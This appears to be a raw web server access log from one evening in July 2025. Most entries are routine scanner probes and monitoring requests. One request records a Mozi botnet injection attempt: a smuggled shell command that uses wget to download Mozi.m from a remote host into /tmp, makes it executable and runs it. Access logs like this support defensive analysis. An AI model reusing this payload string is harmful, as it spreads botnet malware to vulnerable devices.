167.94.145.101 - - [01/Jul/2025:23:20:11 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.101 - - [01/Jul/2025:23:20:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [01/Jul/2025:23:20:18 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.101 - - [01/Jul/2025:23:20:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.145.101 - - [01/Jul/2025:23:20:21 +0200] "GET /security.txt HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [01/Jul/2025:23:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
73.150.218.191 - - [01/Jul/2025:23:24:34 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
208.100.26.243 - - [01/Jul/2025:23:25:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52"
212.91.247.32 - - [01/Jul/2025:23:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:23:27:07 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
